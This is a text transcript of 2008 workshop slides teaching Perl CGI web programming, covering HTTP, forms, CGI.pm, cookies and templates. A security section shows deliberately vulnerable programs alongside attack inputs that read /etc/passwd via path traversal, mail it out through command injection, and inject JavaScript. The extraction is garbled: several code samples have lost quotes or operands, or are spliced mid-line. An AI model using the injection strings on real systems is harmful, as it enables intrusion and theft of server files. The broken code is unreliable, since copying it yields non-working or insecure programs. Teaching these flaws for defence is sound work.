introduction to web programming with perl

Download Introduction to Web Programming with Perl

If you can't read please download the document

Upload: dave-cross

Post on 16-Apr-2017

26.047 views

Category:

Technology


5 download

TRANSCRIPT

What is Perl

Introduction to Web Programming with Perl

Dave CrossMagnum Solutions [email protected]://mag-sol.com

What We Will Cover

The HTTP Protocol

The CGI Protocol

Creating Dynamic Pages with Perl

Getting Input from Forms

The CGI Module

What We Will Cover

Basic Web Security

Using Cookies

Using Templates

Further Information

HTTP

Network Protocols

A protocol is a defined way for objects to interact

Requests and responses are clearly defined

Client makes a request

Server responds

HTTP

Hypertext Transport Protocol

Client is (usually) a web browser

Server is a web server

Client makes a request for a URL

Server responds with appropriate data

HTTP Request

GET / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc9 Firefox/3.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

HTTP Response

HTTP/1.x 200 OK
Date: Wed, 26 Nov 2008 20:42:54 GMT
Server: Apache/2.2.9 (Fedora)
Content-Length: 2172
Connection: close
Content-Type: text/html;charset=ISO-8859-1


...

Things to Note

Client requests a URL

Server works out what data is required

Response includes status code and data

Response defines type of data that follows

URLs

Universal Resource Locator

Defines a resource on the internet

http://example.com/some/path

Static URLs usually map on to a file on the web server

This mapping is defined by the web server

CGI

Beyond Static Pages

Static pages pages are limiting

Dynamic pages are more flexible

e.g. List of products
+ dynamic pages
= Online shop

CGI

Common Gateway Interface

Developed 1995

Defined howData gets into a program

Output from program returned to web server

Dynamic URLs

The web server needs to recognise CGI URLs

Two common methods

Locatione.g. cgi-bin directory

Naminge.g. .cgi extension

cgi-bin

Commonly defined as a place to put CGI programs

All requests to this directory are CGI programs

ScriptAlias /cgi-bin/ "/var/www/cgi-bin/"

.cgi

Commonly defined as the extension for CGI programs

All requests to resources with this extension are CGI programsSays nothing about programming language

AddHandler cgi-script .cgi

Running CGI Programs

Web server checks incoming requests

If it is a CGI request (location or extension)Set up CGI environment

Call program

Return program output to browser

Perl and CGI

Perl and CGI

The early webmasters were also sysadmins

Most sysadmins used Perl a lot

Most CGI programs produce HTML

HTML is just a form of text

Perl is great for manipulating text

Many early CGI programs were written in Perl

Perl is Not CGI

Perl was used long before CGI programs were developed

Perl continues to be used in non-web areas

Other languages have also been used to write CGI programs

Some people still (incorrectly) assume that Perl and CGI are the same thing

Simple Perl CGI Program

#!/usr/bin/perl

print Content-type: text/plain\n\n;
print Hello world;

Simple Perl CGI Program

#!/usr/bin/perl

print Content-type: text/html\n\n;
print "/images/$a_pic"
);

Handling Input

Handling Input

So far all of our examples have only produced output

CGI programs are far more flexible if they can accept input

HTML Forms

CGI programs get their input from HTML forms

Text input, radio buttons, checkboxes, selectors

All seem very similar when they get to your CGI program

Sample HTML Form


Name:



Male
Female

Handling the Form

#!/usr/bin/perl

use CGI ':standard';

my $name = param('name');
my $sex = param('sex');

print header,
start_html(-title=>"Hello $name"),
h1("Hello $name"),
p("Hello $name, you are $sex"),
end_html;

CGI Parameters

The CGI module has function called 'param'

Returns the value of the parameters passed to the program

Pass it the name of the parameter you are interested in

The name is the name of the HTML form input

Listing Parameters

Without an argument, 'param' returns a list of all parameter names

my @params = param;
foreach my $param (@params) {
print p('Param ', b($param), ' is ',
i(param($param)));
}

Multivalued Parameters

Sometimes one name is associated with multiple values

The 'param' function handles this too

Checkboxes

Checkboxes allow you to choose several linked options

Drinks:
Beer
Wine
Coke

Three inputs with the same name

What will 'param' do?

Handling Checkboxes

Our previous form handler already copes with this

'param' returns a space-separated string

$drinks = param('drink');

You can also get a list

@drinks = param('drink');
print join ', ', @drinks;

Perl calls this context

GET vs POST

HTML forms can sent parameters to CGI programs in TWO ways

GET encodes the data in the URL

POST encodes the data in the request body

Define which method to use in the element

Default value is GET

GET

The default method is GET

Can be omitted

Data in URL

http://localhost/cgi/handle_form2?name=Dave&sex=Male&drink=beer&drink=wine&drink=coke

Easy to debug

Easy to hack

POST

POST needs to be set explicitly

Data transmitted in HTTP request body

Not seen in URL

Harder to debug

Harder to hack

Handling GET and POST

CGI.pm hides the difference from you

Both GET and POST parameters are accessed in the same way

'param' handles both methods

Easy to swap between the two

Mishandling CGI Data

CGI.pm has been a standard part of Perl for over ten years

No reason not to use 'param'

Some people still don't

Old code

Or code based on old code

Broken CGI Parser

if ($ENV{'REQUEST_METHOD'} eq 'GET') {
@pairs = split(/&/, $ENV{'QUERY_STRING'});
} elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
@pairs = split(/&/, $buffer);
}

foreach $pair (@pairs) {
my ($name, $val) = split /=/, $pair;

# some decoding skipped...

$form{$name} = $value;
}

You will see code like this

Do not use it

Simple CGI Summary

Simple CGI Summary

CGI defines a way to create dynamic web pages

Web server identifies CGI URLsBy location or name

Web server sets up CGI environment

Calls CGI program

Output returned to browser

CGI Input

CGI input comes from HTML forms

Input is either GET or POST

CGI program sees a series of name/value pairs

Debugging CGI

Debugging CGI

Things will go wrong when writing CGI programs

Here are some suggestions on tracking down problems

Debugging Perl

Same techniques as debugging any Perl program

Help Perl to help you

use strictMust declare variables

use warningsWarn about potential problems

Use both of these in all Perl programs

Check Syntax

Use perl -c to check for syntax errors

#!/usr/bin/perl

Print "hello\n";

$ perl -c print
String found where operator expected at print line 3, near "Print "hello\n""
(Do you need to predeclare Print?)
syntax error at print line 3, near "Print "hello\n""
print had compilation errors.

Check Error Log

All web servers write an error logLocation depends on configuration

Generic error message to browserSecurity feature

Real error message in error log

Anything written to STDERR goes to error log

Writing to Error Log

#!/usr/bin/perl

use CGI 'header';

print header(
-type => 'text/plain'
);

print 'Nothing went wrong!';

# warn writes to STDERR
warn '(Actually something did)';

Errors to Browser

Sometimes it's useful to see real errors in the browser

CGI::Carp does this

use CGI::Carp 'fatalsToBrowser';

Still a security hole

Remove once debugging is overOr, at least, comment it out

Debugging HTTP

It's often useful to debug the HTTP exchange

See exactly what requests and responses are being exchanged

LWP (from CPAN) includes the GET, POST and HEAD programs

Debugging HTTP

#!/usr/bin/perl

use CGI 'header';
print header(
-type => 'text/plain',
-x_go_away => "It's a secret",
);

print 'See headers for more info';

Using HEAD

$ HEAD http://localhost/cgi/headers

200 OK
Connection: close
Date: Sat, 22 Nov 2008 14:59:15 GMT
Server: Apache/2.2.9 (Fedora)
Content-Type: text/plain; charset=ISO-8859-1
Client-Date: Sat, 22 Nov 2008 14:59:15 GMT
Client-Peer: 127.0.0.1:80
Client-Response-Num: 1
X-Go-Away: It's a secret

Live HTTP Headers

Live HTTP Headers is an add-on for Firefox

Allows you to watch the complete HTTP exchangeView

Save

Replay

Web Security

Web Security

Exposing a program on your web server is a brave thing to do

Anyone connected to the internet can run your program

Not everyone out there is nice

Need to be sure your program is secure

What Can Go Wrong?

You want a program to display files from your server

Accepts a file as a parameter

Send the contents of the file to the browser

Here's a first attempt

File Viewer Program

#!/usr/bin/perl
use CGI ':standard';

my $file = param('filename');

print header(-type => 'text/plain');

open FILE, $file
or die "Can't open $file: $!\n";
print while ;

What's Wrong With That?

You just compromised the security of your server

Your server contains many files that outsiders shouldn't see

e.g. /etc/passwd

Now anyone on the internet can see a list of usernames on your server

Forms Won't Save You

You could present a page that only allows people to choose certain filesPeople will look at the source of the form and hack the URL

You could change GET to POST to prevent URL-hackingPeople will create their own form and use that to send hacked parameters

Another Attempt

#!/usr/bin/perl
use CGI ':standard';

my $dir = '/usr/files/';
my $file = $dir . param('filename');

print header(-type => 'text/plain');

open FILE, $file
or die "Can't open $file: $!\n";
print while ;

Another Attempt

We have forced files to exist in a certain directory

Only files in that directory can be viewed

That's not true

We can use '..' to move up a directory

filename=../../etc/passwd

Still insecure

A Different Problem

We want to run a command on the server taking input from the user

For example, a manual page viewer

Takes a page name from user input

Manual Page Viewer

#!/usr/bin/perl

use CGI ':standard';

my $page = param('man');

print header(-type=>'text/plain');
print `man $page | col -b`;

What's Wrong With That?

Once again you've compromised security on your server

Problem is in this lineprint `man $page | col -b`;

Passing user input to an external program

Dangerous input

ls; mail [email protected] < /etc/passwd

Another Problem

Accept user input and write a results page using it

We've done this before

What if the input includes Javascript?

name=Dave

name=Davealert(Gotcha)

Javascript can be dangerous

Trust No-One

All of these problems have the same root cause

We trusted user input

Never trust your users

They are either malicious or stupid

Both options are dangerous to you

Check All Input

Check everything that comes into your program

Don't trust any piece of data

Especially if you're sending it out of your program

Use whitelists to define valid data

Throw out anything that doesn't match

Safe File Viewer

#!/usr/bin/perl
use CGI ':standard';

print header(-type => 'text/plain');

my $dir = '/usr/files/';
my $file = param('filename');
if ($file =~ /^(\w[\w\.]+)$/) {
$file = "$dir/$1";
} else {
print 'Go away!';
die "Bad filename: $file\n";
}
...

Is It Safe?

The safe file viewer assumes that all valid files are in one directory

Therefore the filename can only contain certain characters

/^(\w[\w\.]+)$/

Word characters and dots

No directory slashes

Anchors to match whole string

Safe Manual Viewer

#!/usr/bin/perl

use CGI ':standard';

my $page = param('man');
if ($page =~ /^(\w+)/) {
$page = $1;
}

print header(-type=>'text/plain');
print `man $page | col -b`;

Is It Safe?

Uses a similar approach to the safe file viewer

Unix commands consist of word characters

Use the word characters from the start of the input string

Ignore the rest

Safe HTML Input

#!/usr/bin/perl

use CGI ':standard';

my $name = param('name');
my $sex = param('sex');

$name =~ s/ Privacy -> Show cookies

You will probably have a lot of cookies

Sites use them to track visitors

Some people block them for that reason

Using Cookies

CGI.pm contains a cookie function

Used to both create and access cookie

Cookies need to be sent in the CGI header

Often the first thing to need to do

Setting a Cookie

my $cookie =cookie(
-name=>'time',
-value=>scalar localtime,
-expires=>'+1y'
);

print header(
-cookie => $time_cookie
);
print start_html(
-title=>'Cookie test'
);
print h1('Cookie test');

Getting a Cookie

if (my $time = cookie('time')) {
print p('You last visited this ',
page at $time");
} else {
print p('You haven't visited '
'this page before');
}

Cookie Confusion

People sometimes find cookie code confusing

There are often two completely separate cookies in a program

One incoming, one outgoing

The outgoing cookie is usually dealt with firstBecause it needs to be in the header

Login Example

Cookies can be used to track whether a user is logged in to a site

Write a cookie when the user logs in

Delete it when the user logs outActually just force it to expire

Log In With Cookies (1)

my $name;
my $logged;

if (param('login')) {
$logged = 1;
$name = param('name');
print header(
-cookie => cookie(
-name => 'name',
-value => $name,
-expires => '+1y',
)
);
}

Log In With Cookies (2)

elsif (param('logout')) {
$logged = 0;
$name = 'Guest';
print header(
-cookie => cookie(
-name=>'name',
-value=>'',
-expires=>'-1d',
)
);
}

Log In With Cookies (3)

else {
$logged = defined cookie('name');
$name = cookie('name') || 'Guest';
print header;
}

print start_html(-title => 'Cookies');
print h1('Cookies');
print p('This is a cookie test page');

$name =~ s/ 'logout',
-value => 'logout'));
} else {
print p('Enter your name: ',
textfield(-name => 'name'),
submit(-name => 'login',
-value => 'Set name'));
print end_form;
}

print end_html;

Cookie Security

Secure web apps don't reveal any more data than is necessary

Don't trust the browser

Don't store identifiable data in a cookie

Use a nondescript name

Store the real data on your server

Store a reference to data in cookie

Templates

Templates

So far all of our HTML has been stored in the program

Either hard-coded HTML or CGI.pm functions

This is fine for demos or simple programs

Can cause problems with larger projects

Separating Concerns

It's a good idea to separate business logic from display logic

Code that works out what to display

Code that works out how to display it

Advantages

Easier to change look of site

Easier to have consistent look and feel

Easier to split work between designers and programmers

Easier to produce alternative views of data

Simple Templating

See perlfaq4How can I expand variables in text strings?

Everyone writes a templating system

Most people release their templating system to CPAN

Please don't do that

Templating Systems

Many templating systems on CPAN

Text::Template

HTML::Template

HTML::Mason

Template Toolkit

Many more

I choose the Template Toolkit

Template Toolkit

Flexible templating system

Equally useful in web and non-web applications

Simple templating languageNot perl

Good Book Too

CGI Using Templates

Create an output template containing your HTML

CGI program acts largely as beforeProcesses inputs

Determines outputs

Passes outputs to template processor

Template Example

#!/usr/bin/perl

use CGI qw(param header);
use Template;

my $tt = Template->new;
my $name = param('name');
my $sex = param('sex');
my @drink = param('drink');

print header;

$tt->process('form.tt',
{ name => $name,
sex => $sex,
drink => \@drink })
or die $tt->error;

Template Example



Template Toolkit


Template Toolkit
Your name is [% name %]
Your sex is [% sex %]
You like to drink:


  • [% FOREACH d IN drink -%]
  • [% d %]
    [% END %]



Simpler Templates

#!/usr/bin/perl

use CGI qw(param header);
use Template;

my $tt = Template->new;

print header;

$tt->process('form2.tt')
or die $tt->error;

Simpler Templates

[% USE CGI -%]


Template Toolkit


Template Toolkit
Your name is
[% CGI.param('name') %]
Your sex is
[% CGI.param('sex') %]
You like to drink:


  • [% FOREACH d IN CGI.param('drink') -%]
  • [% d %]
    [% END %]



More Information

More Information

A really quick overview of web programming with Perl

Skimmed over a lot of detail

Some ideas for other things to investigate

Other sources of information

Things Missed Out

CGI.pmFar more functionality that we have covered

CGI environment functions

Sticky fields

Multi-page forms

More complex HTML generation

See perldoc CGI

Alternatives to CGI

CGI can be slow

Perl starts up for every page visit

Doesn't scale well

Alternatives approaches

mod_perl

Embeds a Perl interpreter in Apache

Much faster and more flexible

Storing Data

Most web applications will deal with a database

Storing and retrieving data

Standard Perl database interfaceDBI

More advanced database interfacesDBIx::Class

Web Frameworks

Web frameworks are very fashionable

Model (database)

View (templates)

Controller (logic)

MVC framework

e.g. Ruby on Rails

Perl Frameworks

Perl has MVC frameworks

Most popular is probably Catalyst

DBIx::Class + Template Toolkit

See Matt Trout's Tutorial after lunch

Sources of Information

Documentation for Perl modules at CPANhttp://search.cpan.org/

CGI.pmhttp://search.cpan.org/dist/CGI.pm

Template Toolkithttp://search.cpan.org/dist/Template-Toolkit

http://tt2.org/

Books

CGI Programming with PerlGuelich, Gundavaram, Birznieks

Writing CGI Applications with PerlMeltzer, Michalski

Official Guide to Programming with CGI.pmStein

That's All Folks

Thank you for listening

Any questions?

I'll be around all day

Feel free to email [email protected]

Click to edit the title text format

Click to edit the outline text formatSecond Outline LevelThird Outline LevelFourth Outline LevelFifth Outline LevelSixth Outline LevelSeventh Outline LevelEighth Outline LevelNinth Outline Level

London Perl Workshop29th November 2008